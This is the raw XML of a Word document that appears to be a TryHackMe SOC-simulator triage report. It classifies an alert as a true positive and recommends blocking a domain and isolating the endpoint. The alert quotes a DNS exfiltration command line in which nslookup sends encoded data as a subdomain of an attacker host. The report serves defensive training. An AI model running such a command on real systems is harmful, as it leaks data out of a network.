    <w:p w14:paraId="4DE870F1" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.parent.pid: 3728</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941AE48" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.parent.name: powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7ED1B" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.command_line: "C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFDC54" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.working_directory: C:\Users\michael.ascot\downloads\exfiltration\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06147336" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59949949" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Parent-Child Relationship is suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C967FA" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6AF39" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Hostname being looked up is not real. Also it is being run by a powershell script which may be due to PowerView which may be malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CE988" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7FFB8" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Block the DNS haz4rdw4re.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D9EC50" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Endpoint check,cleanup,isolation, password reset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A14534" w14:textId="51F91FA1" w:rsidR="00CE6146" w:rsidRDefault="00BB3B2B" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="005442A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://tryhackme.com/soc-sim/summary/69229d25cea6ccabe7ead48b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>https://tryhackme.com/soc-sim/public-summary/6023e5ac4f6bff0705e014fddf3d9c0a757ee2069c0b99e9944f376f7097a6685136e1e7f03d83815cbcf9d6a42f9751</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CE614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806D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF160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4E09BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77440F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20B5A4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71C2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565457B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="783AC960"/>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785639A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7D4C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AB0CE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D92A9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2CE25C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1B8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3B247E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D9E9A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1601645"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01683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E1E6A1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92704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0B35276"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9296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023649"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1BE739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819691982">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1949696562">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1383939822">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="617027800">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1665468161">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="5"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="828784950">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="6"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="222565602">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2108695244">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="266239248">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1944798305">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="847133196">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="5"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="38017945">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="732966623">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="774012072">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="578443224">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1522670461">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="5"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1092160184">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="86512191">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1063219233">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="236786146">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1520855193">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="5"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1718773452">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1826969415">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1818178831">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="814225039">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="23096538">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="225649085">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1552572516">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="138826534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57A"/>
    <w:rsid w:val="0008359D"/>
    <w:rsid w:val="000A1F2A"/>
    <w:rsid w:val="00107FAD"/>
    <w:rsid w:val="001811EC"/>
    <w:rsid w:val="00245AB6"/>
    <w:rsid w:val="002B59F4"/>
    <w:rsid w:val="003C6E6A"/>
    <w:rsid w:val="00462050"/>
    <w:rsid w:val="005F0D27"/>
    <w:rsid w:val="005F5A6C"/>
    <w:rsid w:val="006802B1"/>
    <w:rsid w:val="006F454C"/>
    <w:rsid w:val="0085713B"/>
    <w:rsid w:val="008573CD"/>
    <w:rsid w:val="00B80E87"/>
    <w:rsid w:val="00BA43FB"/>
    <w:rsid w:val="00BB3B2B"/>
    <w:rsid w:val="00C05BC3"/>
    <w:rsid w:val="00C2357A"/>
    <w:rsid w:val="00C60D9D"/>
    <w:rsid w:val="00C86771"/>
    <w:rsid w:val="00CD17B9"/>
    <w:rsid w:val="00CE6146"/>
    <w:rsid w:val="00CE7FEB"/>
    <w:rsid w:val="00D47B79"/>
    <w:rsid w:val="00D73730"/>
    <w:rsid w:val="00DC3A1F"/>
    <w:rsid w:val="00EC6874"/>
    <w:rsid w:val="00EF7E47"/>
    <w:rsid w:val="00F17D05"/>
    <w:rsid w:val="00F51CB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C57DDE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A155EB60-23CE-47C5-B5B6-79E72D9800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357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2357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2357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2357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2357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2357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57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57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57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2357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2357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2357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2357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2357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2357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57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57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57A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C2357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57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57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57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57A"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C2357A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C2357A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C2357A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C2357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2357A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C2357A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2357A"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2357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1.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=Windows+User-Mode+Driver+Framework+Host+Service&amp;rlz=1C1SQJL_enIN993IN993&amp;oq=WUDFHost.exe&amp;gs_lcrp=EgZjaHJvbWUqBwgAEAAYgAQyBwgAEAAYgAQyBwgBEAAYgAQyBwgCEAAYgAQyBwgDEAAYgAQyBwgEEAAYgAQyBwgFEAAYgAQyBggGEEUYPDIGCAcQRRg80gEHNDE4ajBqOagCBrACAfEFFUsmAMgS7pU&amp;sourceid=chrome&amp;ie=UTF-8&amp;mstk=AUtExfAukvS3uUoor9fMNrjNptOvlxrYVHORwfNqnbtyzKBaGqVyywp9Ok4k306XtumJpYcDg1DhRrQZxDLyoZcW0kSe2rCwYkNB9K56Iq0RnvK5xIBA2ppt9aY8v8nTPoE_p7s&amp;csui=3&amp;ved=2ahUKEwj83_2q3YqRAxUQOjQIHRUaLrsQgK4QegQIARAC" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.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0.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><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hyperlink" Target="https://tryhackme.com/soc-sim/summary/69229d25cea6ccabe7ead48b"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hyperlink" Target="https://www.google.com/search?sca_esv=a52577f178443ecc&amp;rlz=1C1SQJL_enIN993IN993&amp;q=Domain+Name+System&amp;sa=X&amp;sqi=2&amp;ved=2ahUKEwi-1bzr6I2RAxXg4DgGHWidBTIQxccNegQIMRAC&amp;mstk=AUtExfCnr0aCxXDXe5MM6IPmAioKfc3tjqc18v-P0_5fPWXCnREseBbp8J--ctLrTWF4wrRB4927pL57qbli3V6ALo0GyPmlPWB8Qo6PgTpK3eg847xTllQTFPwlXu2-BLA_-is&amp;csui=3" TargetMode="External"/><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hyperlink" Target="https://www.google.com/search?sca_esv=a52577f178443ecc&amp;rlz=1C1SQJL_enIN993IN993&amp;q=Microsoft+Windows&amp;sa=X&amp;sqi=2&amp;ved=2ahUKEwi-1bzr6I2RAxXg4DgGHWidBTIQxccNegQIMRAB&amp;mstk=AUtExfCnr0aCxXDXe5MM6IPmAioKfc3tjqc18v-P0_5fPWXCnREseBbp8J--ctLrTWF4wrRB4927pL57qbli3V6ALo0GyPmlPWB8Qo6PgTpK3eg847xTllQTFPwlXu2-BLA_-is&amp;csui=3" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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532</TotalTime>
  <Pages>24</Pages>
  <Words>4560</Words>
  <Characters>25997</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>216</Lines>
  <Paragraphs>60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30497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Deshmukh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ashish Deshmukh</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-22T13:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T17:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>